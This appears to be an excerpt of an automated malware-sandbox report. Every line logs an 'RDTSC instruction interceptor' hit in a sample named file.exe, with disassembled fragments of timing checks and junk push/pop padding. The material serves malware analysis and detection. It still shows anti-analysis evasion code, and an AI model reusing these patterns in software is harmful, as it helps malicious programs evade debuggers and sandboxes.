              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D001 second address: 137D005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D005 second address: 137D009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381B81 second address: 1381B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1381B87 second address: 1381B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13150B0 second address: 13150B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13150B6 second address: 13150BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386D73 second address: 1386D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FEA188F2DBCh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386D9F second address: 1386DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1386DA8 second address: 1386DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389219 second address: 1389249 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jnc 00007FEA188A9BDCh 0x00000012 jl 00007FEA188A9BDCh 0x00000018 jl 00007FEA188A9BD6h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389249 second address: 138924D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138924D second address: 138927B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188A9BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FEA188A9BD8h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEA188A9BDAh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138927B second address: 1389285 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138937D second address: 13893D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEA188A9BD6h 0x00000009 jmp 00007FEA188A9BE3h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FEA188A9BE1h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FEA188A9BE9h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13894EE second address: 1389505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA188F2DC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389505 second address: 1389517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FEA188A9BD6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389517 second address: 138951B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138951B second address: 1389550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FEA188A9BEBh 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEA188A9BDDh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A822 second address: 138A830 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188F2DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A830 second address: 138A83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEA188A9BD6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A83A second address: 138A842 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A842 second address: 138A847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A847 second address: 138A86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jnl 00007FEA188F2DB6h 0x00000013 jo 00007FEA188F2DB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13919DC second address: 13919E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13919E0 second address: 13919FC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA188F2DB6h 0x00000008 jmp 00007FEA188F2DC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13919FC second address: 1391A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391A02 second address: 1391A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEA188F2DC7h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 jnc 00007FEA188F2DB6h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390713 second address: 139071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390D8D second address: 1390D97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA188F2DB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390F13 second address: 1390F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390F19 second address: 1390F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390F26 second address: 1390F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391350 second address: 1391356 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391356 second address: 139136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FEA188A9BD8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139136A second address: 139136E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139136E second address: 1391374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B59FC second address: 13B5A1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA188F2DC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5A1C second address: 13B5A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A1F second address: 13B8A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A28 second address: 13B8A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEA188A9BE4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FEA188A9BE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A5B second address: 13B8A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jnp 00007FEA188F2DE8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA188F2DBFh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8A7A second address: 13B8A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BAC second address: 13B8BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC2h 0x00000009 pop esi 0x0000000a jmp 00007FEA188F2DC5h 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jo 00007FEA188F2DB6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BE8 second address: 13B8BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BF4 second address: 13B8BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8BF8 second address: 13B8C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEA188A9BE5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEE08 second address: 13BEE67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBCh 0x00000007 jmp 00007FEA188F2DC5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 je 00007FEA188F2DB6h 0x00000016 jng 00007FEA188F2DB6h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f push ebx 0x00000020 ja 00007FEA188F2DB6h 0x00000026 jmp 00007FEA188F2DC3h 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e ja 00007FEA188F2DB6h 0x00000034 jc 00007FEA188F2DB6h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD7E9 second address: 13BD816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FEA188A9BD6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop eax 0x00000011 push edi 0x00000012 jmp 00007FEA188A9BE3h 0x00000017 je 00007FEA188A9BDCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD96C second address: 13BD970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD970 second address: 13BD974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD974 second address: 13BD97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDDBB second address: 13BDDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDDC1 second address: 13BDDCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA188F2DC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDDCB second address: 13BDDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F4DA second address: 135F4E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F4E0 second address: 135F597 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA188A9BD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c jno 00007FEA188A9BD8h 0x00000012 popad 0x00000013 mov ebx, dword ptr [ebp+124825D9h] 0x00000019 mov dh, 1Ch 0x0000001b jmp 00007FEA188A9BDDh 0x00000020 add eax, ebx 0x00000022 call 00007FEA188A9BE2h 0x00000027 mov edi, dword ptr [ebp+122D2B40h] 0x0000002d pop edx 0x0000002e push eax 0x0000002f pushad 0x00000030 jmp 00007FEA188A9BE0h 0x00000035 jp 00007FEA188A9BD8h 0x0000003b popad 0x0000003c mov dword ptr [esp], eax 0x0000003f mov edx, 4E2F9D5Fh 0x00000044 push 00000004h 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007FEA188A9BD8h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 00000019h 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 jmp 00007FEA188A9BE1h 0x00000065 push eax 0x00000066 jo 00007FEA188A9BF8h 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007FEA188A9BE0h 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE033 second address: 13BE039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C566F second address: 13C567F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA188A9BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C567F second address: 13C5684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5684 second address: 13C5697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FEA188A9BD6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5697 second address: 13C569B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C57BD second address: 13C57C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C57C1 second address: 13C57DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5EC7 second address: 13C5ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5ECF second address: 13C5EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DBAh 0x00000009 jmp 00007FEA188F2DC1h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FEA188F2DB6h 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C676E second address: 13C6776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6776 second address: 13C6791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC6h 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6A4D second address: 13C6A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FEA188A9BE9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6D0E second address: 13C6D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6D14 second address: 13C6D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FEA188A9BDCh 0x0000000e jnl 00007FEA188A9BD6h 0x00000014 jmp 00007FEA188A9BE7h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C731C second address: 13C732D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C732D second address: 13C7343 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA188A9BDAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FEA188A9BD6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF5A7 second address: 13CF5AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF5AD second address: 13CF5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CF5B7 second address: 13CF5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188F2DC9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFA68 second address: 13CFA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FEA188A9BE9h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFBDE second address: 13CFBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFBE2 second address: 13CFBF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEA188A9BDEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFDC2 second address: 13CFDDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA188F2DC1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007FEA188F2DB6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFDDF second address: 13CFDE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFDE3 second address: 13CFE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA188F2DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007FEA188F2DC5h 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jnc 00007FEA188F2DB6h 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CFE14 second address: 13CFE3A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA188A9BEFh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7E20 second address: 13D7E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D80BB second address: 13D80CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FEA188A9BD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8231 second address: 13D824B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA188F2DB6h 0x00000008 js 00007FEA188F2DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007FEA188F2DB6h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D824B second address: 13D826D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA188A9BD8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA188A9BE4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D826D second address: 13D8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D86C2 second address: 13D86D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA188A9BE1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8823 second address: 13D8837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FEA188F2DBBh 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8B00 second address: 13D8B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA188A9BE5h 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8B1A second address: 13D8B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D8B20 second address: 13D8B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
